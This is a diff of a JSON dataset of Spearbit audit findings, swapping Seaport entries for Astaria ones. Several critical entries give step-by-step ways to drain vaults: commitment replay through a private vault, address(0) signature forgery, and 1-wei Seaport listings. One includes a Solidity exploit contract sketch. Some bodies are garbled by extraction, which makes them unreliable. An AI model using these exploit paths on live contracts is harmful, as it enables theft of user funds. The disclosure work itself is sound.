"Seaport", + "Astaria", "Severity: Informational" ] }, { - "title": "Resolving additional offer items supplied by contract orders with criteria can be impractical", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "Contract orders can supply additional offer amounts when the order is executed. However, if they supply extra offer items with criteria, on the fly, the fulfiller won't be able to supply the necessary criteria resolvers (the correct Merkle proofs). This can lead to flaky orders that are impractical to fulfill.", + "title": "VIData.allowlist can transfer shares to entities not on the allowlist", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "allowList is only used to restrict the share recipients upon mint or deposit to a vault if allowListEnabled is set to true. These shareholders can later transfer their shares to other users who might not be on the allowList.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Informational" ] }, { - "title": "Use of confusing named constant SpentItem_size in a function that deals with only ReceivedItem", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "The named constant SpentItem_size is used in the function copyReceivedItemsAsConsiderationItems, even though the context has nothing to do with SpentItem.", + "title": "Extract common struct fields from IStrategyValidator implementations", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "All the IStrategyValidator implementations have the following data encoded in NewLienRequest.nlrDetails: struct CommonData { uint8 version; address token; // LP token for Uni_V3...
address borrower; ILienToken.Details lienDetails; bytes moreData; // depends on each implementation }", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Informational" ] }, { - "title": "The ABI-decoding of generateOrder returndata does not have sufficient checks to prevent out of bounds returndata reads", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "There was some attempt to avoid out of bounds returndata access in the ConsiderationDecoder. However, the two returndatacopy(...) in ConsiderationDecoder.sol#L456-L461 can still lead to out of bounds access and therefore may revert. Assume that code reaches the line ConsiderationDecoder.sol#L456. We have the following constraints: 1. returndatasize >= 4 * 32: ConsiderationDecoder.sol#L428 2. offsetOffer <= returndatasize: ConsiderationDecoder.sol#L444 3. offsetConsideration <= returndatasize: ConsiderationDecoder.sol#L445 If we pick a returndata that satisfies 1 and let offsetOffer == offsetConsideration == returndatasize, all the constraints are true. But the returndatacopy would revert due to an out-of-bounds read. Note: High-level Solidity avoids reading from out of bounds returndata. This is usually done by checking if returndatasize() is large enough for static data types and always doing returndatacopy of the form returndatacopy(x, 0, returndatasize()).", + "title": "_createLien() takes in an extra argument", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "_createLien(LienStorage storage s, ...) doesn't use s, which hence can be removed as an argument.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Informational" ] }, { - "title": "Consider renaming writeBytes to writeBytes32", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "The function name writeBytes is not accurate in this context.", + "title": "unchecked has no effect", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "unchecked only affects the arithmetic operations directly nested under it. In this case unchecked is unnecessary: unchecked { s.yIntercept = (_totalAssets(s)); s.last = block.timestamp.safeCastTo40(); }", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Informational" ] }, { - "title": "Missing test case for criteria-based contract orders and identifierOrCriteria != 0 case", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "The only test case for criteria-based contract orders is in advanced.spec.ts#L434. This tests the case for identifierOrCriteria == 0. For the other case, identifierOrCriteria != 0, tests are missing.", + "title": "Multicall can reuse msg.value", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "A delegatecall forwards the same value for msg.value as found in the current context. Hence, all delegatecalls in a loop use the same value for msg.value. If these calls use msg.value, they have the ability to use the native token balance of the contract itself: for (uint256 i = 0; i < data.length; i++) { (bool success, bytes memory result) = address(this).delegatecall(data[i]); ...
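  // Note: every delegatecall in this loop observes the original msg.value,
  // so a payable target that spends msg.value can do so repeatedly,
  // drawing on the contract's own native token balance.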
}", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Informational" ] }, { - "title": "NatSpec comment for conduitKey in bulkTransfer() says \"optional\" instead of \"mandatory\"", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "The NatSpec comment says that conduitKey is optional but there is a check making sure that this value is always supplied.", + "title": "Authorised entities can drain user assets", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "An authorized entity can steal user approved tokens (vault assets and vault tokens, ...) using these endpoints 58 function tokenTransferFrom( address token, address from, address to, uint256 amount ) external requiresAuth { ERC20(token).safeTransferFrom(from, to, amount); } function tokenTransferFromWithErrorReceiver( address token, address from, address to, uint256 amount ) external requiresAuth { try ERC20(token).transferFrom(from, to, amount) {} catch { _transferToErrorReceiver(token, from, to, amount); } } Same risk applies to all the other upgradable contracts.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Informational" ] }, { - "title": "Comparing the magic values returned by different contracts are inconsistent", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "In ZoneInteraction's _callAndCheckStatus we perform the following comparison for the returned magic value: let magic := shr(224, mload(callData)) magicMatch := eq(magic, shr(224, mload(0))) But the returned magic value comparison in _assertValidSignature without truncating the returned value: if iszero(eq(mload(0), EIP1271_isValidSignature_selector))", + "title": "Conditional statement in _validateSignature(...) can be simplified/optimized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "When validating the vault strategist's (or delegate's) signature for the commitment, we perform the following check if ( (recovered != strategist && recovered != delegate) || recovered == address(0) ) { revert IVaultImplementation.InvalidRequest( IVaultImplementation.InvalidRequestReason.INVALID_SIGNATURE ); } The conditional statement: (recovered != strategist && recovered != delegate) 59 perhaps can be optimised/simplified.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Informational" ] }, { - "title": "Document the structure of the TypehashDirectory", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "Instances of TypehashDirectory would act as storage contracts with runtime bytecode: [0x00 - 0x00] 00 [0x01 - 0x20] h(struct BulkOrder { OrderComponents[2] [0x21 - 0x40] h(struct BulkOrder { OrderComponents[2][2] ... [0xNN - 0xMM] h(struct BulkOrder { OrderComponents[2][2]...[2] tree }) tree }) tree }) 56 h calculates the eip-712 typeHash of the input struct. 
0xMM would be mul(MaxTreeHeight, 0x20) and 0xNN = 0xMM - 0x1f.", + "title": "AstariaRouter cannot deposit into private vaults", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "The allowlist for private vaults only includes the private vault's owner: function newVault( address delegate, address underlying ) external whenNotPaused returns (address) { address[] memory allowList = new address[](1); allowList[0] = msg.sender; RouterStorage storage s = _loadRouterSlot(); ... } Note that for private vaults we cannot modify or disable/enable the allowlist. It is always enabled and only includes the owner. That means only the owner can deposit into the private vault: function deposit( uint256 amount, address receiver ) public virtual whenNotPaused returns (uint256) { VIData storage s = _loadVISlot(); require(s.allowList[msg.sender] && receiver == owner()); ... } If the owner would like to be able to use the AstariaRouter's interface by calling its deposit(...) or depositToVault(...) endpoint (which uses the pulling strategy from the transfer proxy), they would not be able to. Anyone can still transfer tokens to this private vault directly, by calling transfer on asset(). So the above requirement require(s.allowList[msg.sender] ... ) seems to also be there to avoid potential mistakes when one is calling the ERC4626RouterBase.deposit(...) endpoint to deposit into the vault indirectly using the router.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Informational" ] }, { - "title": "Document what twoSubstring encodes", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "We have: bytes32 constant twoSubstring = 0x5B325D0000000000000000000000000000000000000000000000000000000000; which encodes: cast --to-ascii 0x5B325D0000000000000000000000000000000000000000000000000000000000 [2]", + "title": "Reorganise sanity/validity checks in the commitToLien(...) flow", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "The following checks are performed in _validateRequest(...): params.lienRequest.amount == 0: if (params.lienRequest.amount == 0) { revert ILienToken.InvalidLienState( ILienToken.InvalidLienStates.AMOUNT_ZERO ); } The above check can be moved to the very beginning of the commitToLien(...) flow. Perhaps right before or after we check that the commitment's provided vault is valid. newStack.lien.details.duration < s.minLoanDuration can be checked right after we compare the duration to the time to the second epoch end: if (publicVault.supportsInterface(type(IPublicVault).interfaceId)) { uint256 timeToSecondEpochEnd = publicVault.timeToSecondEpochEnd(); require(timeToSecondEpochEnd > 0, \"already two epochs ahead\"); if (timeToSecondEpochEnd < lien.details.duration) { lien.details.duration = timeToSecondEpochEnd; } } if (lien.details.duration < s.minLoanDuration) { revert ILienToken.InvalidLienState( ILienToken.InvalidLienStates.MIN_DURATION_NOT_MET ); } This only works if we assume the LienToken.createLien(...) endpoint does not change the duration. The current implementation does not.
block.timestamp > params.lienRequest.strategy.deadline can also be checked at the very beginning of the commitToLien flow.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Informational" ] }, { - "title": "Upper bits of the to parameter to call opcodes are stripped out by clients", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "Upper bits of the to parameter to call opcodes are stripped out by clients. For example, geth would strip the upper bytes out: instructions.go#L674 uint256.go#L114-L121 So even though the to parameters in this context can have dirty upper bits, the call opcodes can be successful, and masking these values in the contracts is not necessary for this context.", + "title": "Refactor fetching strategyValidator", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "Both _validateCommitment(...) and getStrategyValidator(...) need to fetch strategyValidator, and both use the same logic.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Informational" ] }, { - "title": "Remove unused functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "The functions in the above context are not used in the codebase.", + "title": "The stack provided as extra data to settle Seaport auctions needs to be retrievable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "The stack provided as extra data to settle Seaport auctions needs to be retrievable. Perhaps one can figure this out from various events or off-chain agents, but it is not directly retrievable.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Informational" ] }, { - "title": "Fulfillment_itemIndex_offset can be used instead of OneWord", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "In the above context, one has: // Get the item index using the fulfillment pointer. itemIndex := mload(add(mload(fulfillmentHeadPtr), OneWord))", + "title": "Make sure CollateralToken is connected to Seaport v1.5", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "Currently the CollateralToken proxy (v0) is connected to Seaport v1.1, which has different callbacks to the zone and also only performs static calls. If the current version of CollateralToken gets connected to Seaport v1.1, no one would be able to settle auctions created by the CollateralToken. This is due to the fact that the callbacks would revert.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Informational" ] }, { - "title": "Document how the _pauser role is assigned for PausableZoneController", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "The _pauser role is an important role for a PausableZoneController.
It can pause any zone created by this controller and thus transfer all the native token funds locked in that zone to itself.", + "title": "LienToken.transferFrom does not update a public vault's bookkeeping parameters when a lien is transferred to it.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "When transferFrom is called, there is no check whether the from or to parameters could be a public vault. Currently, there is no mechanism for public vaults to transfer their liens. But private vault owners, who are also the owners of the vault's lien tokens, can call transferFrom and transfer their liens to a public vault. In this case, we would need to make sure to update the bookkeeping for the public vault that the lien was transferred to. On the LienToken side, s.LienMeta[id].payee needs to be set to the address of the public vault. And on the PublicVault side, yIntercept, slope, last, epochData of VaultData need to be updated (this requires knowing the lien's end). However, private vaults do not keep a record of these values, and the corresponding values are only saved in stacks off-chain and validated on-chain using their hash.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: Critical Risk" ] }, { - "title": "_aggregateValidFulfillmentConsiderationItems's memory layout assumptions depend on _val- idateOrdersAndPrepareToFulfill's memory manipulation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "ceivedItem.recipient's offset of considerationItemPtr to write to receivedItem at offset (the same offset is also used here): _aggregateValidFulfillmentConsiderationItems are we In the Re- the same // Set the recipient on the received item. mstore( add(receivedItem, ReceivedItem_recipient_offset), mload(add(considerationItemPtr, ReceivedItem_recipient_offset)) ) looks buggy, This tion[i].endAmount with consideration[i].recipient: but in _validateOrdersAndPrepareToFulfill(...) we overwrite considera- mstore( add( considerationItem, ReceivedItem_recipient_offset // old endAmount ), mload( add( considerationItem, ConsiderationItem_recipient_offset ) ) ) in _fulfillAvailableAdvancedOrders and Also _validateOrdersAndPrepareToFulfill gets called first _matchAdvancedOrders. This is important since the memory for the consideration arrays needs to be updated before we reach _aggregateValidFulfillmentConsiderationItems. 59", + "title": "Anyone can take a valid commitment combined with a self-registered private vault to steal funds from any vault without owning any collateral", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The issue stems from the following check in VaultImplementation._validateCommitment(params, receiver): if ( msg.sender != holder && receiver != holder && receiver != operator && !ROUTER().isValidVault(receiver) // <-- the problematic condition ) { ... In this if block, if receiver is a valid vault, the body of the if is skipped. A valid vault is one that has been registered in AstariaRouter using newVault or newPublicVault. So, for example, any private vault supplied as the receiver would be allowed here and the call to _validateCommitment will continue without reverting, at least in this if block.
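To make the problematic condition concrete, here is a minimal sketch of the exploit path; the interfaces are reduced to the endpoints the finding mentions, and all signatures here are assumptions for illustration, not the project's actual API:

```solidity
// Reduced interfaces; the real signatures differ, these are assumptions.
interface IAstariaRouterSketch {
    function newVault(address delegate, address underlying) external returns (address);
}

interface IVaultSketch {
    function commitToLien(bytes calldata commitment, address receiver) external;
    function withdraw(uint256 amount, address receiver, address owner) external;
}

contract ReceiverBypass {
    function run(
        IAstariaRouterSketch router,
        IVaultSketch victim,
        bytes calldata stolenCommitment,
        address weth
    ) external {
        // 1. Register a fresh private vault: ROUTER().isValidVault(v) is now true.
        address v = router.newVault(address(0), weth);
        // 2. Replay someone else's valid commitment with our vault as receiver;
        //    the !ROUTER().isValidVault(receiver) condition no longer blocks it.
        victim.commitToLien(stolenCommitment, v);
        // 3. Drain the borrowed funds from the vault we own.
        IVaultSketch(v).withdraw(type(uint256).max, msg.sender, address(this));
    }
}
```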
If we backtrack function calls to _validateCommitment, we arrive at 3 exposed endpoints: commitToLiens buyoutLien commitToLien A call to commitToLiens will end up having the receiver be the AstariaRouter. A call to buyoutLien will set the receiver as the recipient() for the vault, which is either the vault itself for public vaults or the owner for private vaults. So we are only left with commitToLien, where the caller can set the value for the receiver directly. A call to commitToLien will initiate a series of function calls, and so receiver is only supplied to _validateCommitment to check whether it is allowed to be used, and finally when transferring wETH (safeTransfer). This opens up exploiting scenarios where an attacker: 1. Creates a new private vault by calling newVault, let's call it V. 2. Takes a valid commitment C, combines it with V and supplies those to commitToLien. 3. Calls the withdraw endpoint of V to withdraw all the funds. For step 2, the attacker can source valid commitments by doing either of the following: 1. Frontrun calls to commitToLiens and take all the commitments C0, · · · , Cn and supply them one by one along with V to the commitToLien endpoint of the vault that was specified by each Ci. 2. Frontrun calls to commitToLien endpoints of vaults, take their commitment C and combine it with V to send to commitToLien. 3. Backrun either of the above scenarios and create a new commitment with a new lien request that tries to max out the potential debt for a collateral while also keeping other inequalities valid (for example, the inequality regarding liquidationInitialAsk).", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: Critical Risk" ] }, { - "title": "recipient is provided as the fulfiller for the OrderFulfilled event", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "In the above context in general it is not true that the recipient is the fulfiller. Also note that recipient is address(0) for match orders.", + "title": "Collateral owner can steal funds by taking liens while asset is listed for sale on Seaport", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "We only allow collateral holders to call listForSaleOnSeaport if they are listing the collateral at a price that is sufficient to pay back all of the liens on their collateral. When a new lien is created, we check that collateralStateHash != bytes32(\"ACTIVE_AUCTION\") to ensure that the collateral is able to accept a new lien. However, calling listForSaleOnSeaport does not set the collateralStateHash, so it doesn't stop us from taking new liens. As a result, a user can deposit collateral and then, in one transaction: List the asset for sale on Seaport for 1 wei. Take the maximum possible loans against the asset. Buy the asset on Seaport for 1 wei.
The 1 wei will not be sufficient to pay back the lenders, and the user will be left with the collateral as well as the loans (minus 1 wei).", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: Critical Risk" ] }, { - "title": "availableOrders[i] return values need to be explicitly assigned since they live in a region of memory which might have been dirtied before", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "Seaport 1.1 did not have the following default assignment: if (advancedOrder.numerator == 0) { availableOrders[i] = false; continue; } But this is needed here since the current memory region which was previously used by the accumulator might be dirty.", + "title": "validateStack allows any stack to be used with collateral with no liens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The validateStack modifier is used to confirm that a stack entered by a user matches the stateHash in storage. However, the function reverts under the following conditions: if (stateHash != bytes32(0) && keccak256(abi.encode(stack)) != stateHash) { revert InvalidState(InvalidStates.INVALID_HASH); } The result is that any collateral with stateHash == bytes32(0) (which is all collateral without any liens taken against it yet) will accept any provided stack as valid. This can be used in a number of harmful ways. Examples of vulnerable endpoints are: createLien: If we create the first lien but pass a stack with other liens, those liens will automatically be included in the stack going forward, which means that the collateral holder will owe money they didn't receive. makePayment: If we make a payment on behalf of a collateral with no liens, but include a stack with many liens (all owed to me), the result will be that the collateral will be left with the remaining liens continuing to be owed. buyoutLien: Anyone can call buyoutLien(...) and provide parameters that are spoofed but satisfy some constraints so that the call would not revert. This is currently possible due to the issue in this context. As a consequence the caller can: _mint any unminted liens, which can DoS the system. _burn lienIds that they don't have the right to remove. manipulate any public vault's storage (if it has been set as a payee for a lien) through its handleBuyoutLien. It seems like this endpoint might have been meant to be a restricted endpoint that only registered vaults can call into, and the caller/user is supposed to only call into here from VaultImplementation.buyoutLien.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: Critical Risk" ] }, { - "title": "Usage of MemoryPointer / formatting inconsistent in _getGeneratedOrder", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "Usage of MemoryPointer / formatting is inconsistent between the loop used OfferItems and the loop used for ConsiderationItems.", + "title": "A borrower can list their collateral on Seaport and receive almost all the listing price without paying back their liens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "When the collateral is listed on SeaPort by the borrower using listForSaleOnSeaport, if that order gets fulfilled/matched and ClearingHouse's fallback function gets called, s.auctionData is not populated and thus, since stack.length is 0, this loop will not run and no payment is sent to the lending vaults.
The rest of the payment is sent to the borrower. And the collateral token and its related data get burnt/deleted by calling settleAuction. The lien tokens and the vaults remain untouched as though nothing has happened. So basically a borrower can: 1. Take/borrow liens by offering a collateral. 2. List their collateral on SeaPort through the listForSaleOnSeaport endpoint. 3. Once/if the SeaPort order fulfills/matches, the borrower would be paid the listing price minus the amount sent to the liquidator (address(0) in this case, which should be corrected). 4. Collateral token/data gets burnt/deleted. 5. Lien token data remains and the loans are not paid back to the vaults. And so the borrower could end up with all the loans they have taken plus the listing price from the SeaPort order. Note that when a user lists their own collateral on Seaport, it seems that we intentionally do not kick off the auction process: Liens are continued. Collateral state hash is unchanged. liquidator isn't set. Vaults aren't updated. Withdraw proxies aren't set, etc. Related issue 88.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: Critical Risk" ] }, { - "title": "newAmount is not used in _compareItems", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "newAmount is unused in _compareItems. If originalItem points to I = (t, T , i, as, ae) and the newItem to Inew = (t 0, T 0, i 0, a0 s, a0 e) where parameter description t 0 t T , T 0 i 0 i as, a0 s ae, a0 e c then we have itemType itemType for I after the adjustment for restricted collection items token identifierOrCriteria identifierOrCriteria for I after the adjustment for restricted collection items startAmount endAmount _compareItems c(I, Inew ) = (t 6= t 0) _ (T 6= T 0) _ (i 6= i 0) _ (as 6= ae) and so we are not comparing either as to a0 enforced. In _getGeneratedOrder we have the following check: as > a0 errorBuffer. inequality is reversed for consideration items). And so in each loop (t 6= t 0) _ (T 6= T 0) _ (i 6= i 0) _ (as 6= ae) _ (as > a0 s or a0 s to a0 e. In abi_decode_generateOrder_returndata a0 s = a0 e is s (invalid case for offer items that contributes to s) is ored to errorBuffer.", + "title": "Phony signatures can be used to forge any strategy", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "In _validateCommitment(), we check that the merkle root of the strategy has been signed by the strategist or delegate. After the signer is recovered, the following check is performed to validate the signature: recovered != owner() && recovered != s.delegate && recovered != address(0) This check seems to be miswritten, so that any time recovered == address(0), the check passes. When ecrecover is used to check the signed data, it returns address(0) in the situation that a phony signature is submitted. See this example for how this can be done.
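A minimal sketch of why the boolean shape is unsafe (generic helper functions, not the project's code): ecrecover returns address(0) for any malformed signature, e.g. an invalid v value, so putting the zero-address comparison last in a conjunction of "revert" conditions means a forged signature never triggers the revert.

```solidity
// Buggy shape: the revert condition is never triggered when ecrecover
// returns address(0), which it does for any malformed (phony) signature.
function isAuthorizedBuggy(bytes32 digest, uint8 v, bytes32 r, bytes32 s_,
    address owner_, address delegate_) pure returns (bool) {
    address recovered = ecrecover(digest, v, r, s_);
    // mirrors: recovered != owner() && recovered != s.delegate && recovered != address(0)
    bool shouldRevert = recovered != owner_ && recovered != delegate_ && recovered != address(0);
    return !shouldRevert; // passes whenever recovered == address(0)
}

// Safer ordering: reject the zero address first, then compare signers.
function isAuthorizedFixed(bytes32 digest, uint8 v, bytes32 r, bytes32 s_,
    address owner_, address delegate_) pure returns (bool) {
    address recovered = ecrecover(digest, v, r, s_);
    if (recovered == address(0)) return false;
    return recovered == owner_ || recovered == delegate_;
}
```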
The result is that any borrower can pass in any merkle root they'd like, sign it in a way that causes address(0) to return from ecrecover, and have their commitment validated.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: Critical Risk" ] }, { - "title": "reformat validate so that its body is consistent with the other external functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "For consistency with other functions we can rewrite validate as: function validate( Order[] calldata /* orders */ ) external override returns (bool /* validated */ ) { return _validate(to_dyn_array_Order_ReturnType( abi_decode_dyn_array_Order )(CalldataStart.pptr())); } Needs to be checked if it changes code size or gas cost. Seaport: Fixed in PR 824. Spearbit: Verified.", + "title": "Inequalities involving liquidationInitialAsk and potentialDebt can be broken when buyoutLien is called", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "When we commit to a new lien, the following gets checked to be true for all j ∈ {0, · · · , n − 1}: onew + on−1 + · · · + oj ≤ Lj, where: oi is _getOwed(newStack[i], newStack[i].point.end); onew is _getOwed(newSlot, newSlot.point.end); n is stack.length; Li is newStack[i].lien.details.liquidationInitialAsk; L'k is params.encumber.lien.details.liquidationInitialAsk; k is params.position; and A'k is params.encumber.amount. So in a stack, in general we should have: · · · + oj+1 + oj ≤ Lj. But when an old lien is replaced with a new one, we only perform the following checks for L'k: L'k > 0 ∧ L'k ≥ A'k. And thus we can introduce L'k ≪ Lk or o'k ≫ ok (by pushing the lien duration), which would break the inequality regarding the oi s and Li s. If the inequality is broken, for example, if we buy out the first lien in the stack, then if the lien expires and goes into a Seaport auction, the auction's starting price L0 would not be able to cover all the potential debts even at the beginning of the auction.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "Add commented parameter names (Type Location /* name */)", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "Add commented parameter names (Type Location /* name */) for validate: Order[] calldata /* orders */ Seaport: Fixed in commit 74de34. Spearbit: Verified.", + "title": "VaultImplementation.buyoutLien can be DoSed by calls to LienToken.buyoutLien", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Anyone can call into LienToken.buyoutLien and provide params of the type LienActionBuyout: params.incoming is not used, so for example vault signatures or strategy validation is skipped. There are a few checks for params.encumber.
Let's define the following variables: i = params.position; kj = params.encumber.stack[j].point.position; tj = params.encumber.stack[j].point.last; ej = params.encumber.stack[j].point.end; e'i = tnow + D'i; lj = params.encumber.stack[j].point.lienId; l'i = h(N'i, V'i, S'i, c'i, (A'max i, r'i, D'i, P'i, L'i)), where h is the keccak256 of the encoding; rj = params.encumber.stack[j].lien.details.rate (old rate); r'i = params.encumber.lien.details.rate (new rate); c = params.encumber.collateralId; cj = params.encumber.stack[j].lien.collateralId; c'i = params.encumber.lien.collateralId; Aj = params.encumber.stack[j].point.amount; A'i = params.encumber.amount; Amax j = params.encumber.stack[j].lien.details.maxAmount; A'max i = params.encumber.lien.details.maxAmount; R = params.encumber.receiver; Nj = params.encumber.stack[j].lien.token; N'i = params.encumber.lien.token; Vj = params.encumber.stack[j].lien.vault; V'i = params.encumber.lien.vault; Sj = params.encumber.stack[j].lien.strategyRoot; S'i = params.encumber.lien.strategyRoot; Dj = params.encumber.stack[j].lien.details.duration; D'i = params.encumber.lien.details.duration; Pj = params.encumber.stack[j].lien.details.maxPotentialDebt; P'i = params.encumber.lien.details.maxPotentialDebt; Lj = params.encumber.stack[j].lien.details.liquidationInitialAsk; L'i = params.encumber.lien.details.liquidationInitialAsk; Imin = AstariaRouter.s.minInterestBPS; Dmin = AstariaRouter.s.minDurationIncrease; tnow = block.timestamp; bi = buyout; o = _getOwed(params.encumber.stack[params.position], block.timestamp); oj = _getOwed(params.encumber.stack[j], params.encumber.stack[j].point.end); n = params.encumber.stack.length; O = o0 + o1 + · · · + on−1 = _getMaxPotentialDebtForCollateral(params.encumber.stack); sj = params.encumber.stack[j]; s'i = newStack. Let's go over the checks and modifications that buyoutLien does: 1. validateStack is called to make sure that the hash of params.encumber.stack matches s.collateralStateHash's value for c. This is not important and can be bypassed by the exploit even after the fix for Issue 106. 2. _createLien is called next, which does the following checks: 2.1. c is not up for auction. 2.2. We haven't reached the max number of liens, currently set to 5. 2.3. L'i > 0 and L'i ≥ A'i. 2.4. If params.encumber.stack is not empty, then c'i = c0. 2.5. We _mint a new lien for R with id equal to h(N'i, V'i, S'i, c'i, (A'max i, r'i, D'i, P'i, L'i)), where h is the hashing mechanism of encoding and then taking the keccak256. 2.6. The new stack slot and the new lien id are returned. 3. isValidRefinance is called, which performs the following checks: 3.1. checks c'i = ci. 3.2. checks either (r'i < ri − Imin) ∧ (e'i ≥ ei) or (r'i ≤ ri) ∧ (e'i ≥ ei + Dmin). 4. check whether c'i is in auction by checking s.collateralStateHash's value. 5. check O ≤ P'i. 6. check A'max i ≥ o. 7. send wETH through TRANSFER_PROXY from msg.sender to the payee of li with the amount of bi. 8. if the payee of li is a public vault, do some bookkeeping by calling handleBuyoutLien. 9. call _replaceStackAtPositionWithNewLien to: 9.1. replace si with s'i in params.encumber.stack. 9.2. _burn li. 9.3. delete s.lienMeta of li.
So in a nutshell the important checks are: c, ci are not in auction (not important for the exploit); c'i = ci; n is less than or equal to the max number of allowed liens (5 currently) (not important for the exploit); L'i > 0 and L'i ≥ A'i; O ≤ P'i; A'max i ≥ o; and (r'i < ri − Imin) ∧ (e'i ≥ ei) or (r'i ≤ ri) ∧ (e'i ≥ ei + Dmin). Exploit: An attacker can DoS the VaultImplementation.buyoutLien as follows: 1. A vault decides to buy out a collateral's lien to offer better terms and so signs a commitment, and someone on behalf of the vault calls VaultImplementation.buyoutLien, which if executed would call LienToken.buyoutLien with the following parameters: LienActionBuyout({ incoming: incomingTerms, position: position, encumber: ILienToken.LienActionEncumber({ collateralId: collateralId, amount: incomingTerms.lienRequest.amount, receiver: recipient(), lien: ROUTER().validateCommitment({ commitment: incomingTerms, timeToSecondEpochEnd: _timeToSecondEndIfPublic() }), stack: stack }) }) 2. The attacker frontruns the call from step 1 and instead provides the following modified parameters to LienToken.buyoutLien: LienActionBuyout({ incoming: incomingTerms, // not important, since it is not used and can be zeroed-out to save tx gas position: position, encumber: ILienToken.LienActionEncumber({ collateralId: collateralId, amount: incomingTerms.lienRequest.amount, receiver: msg.sender, 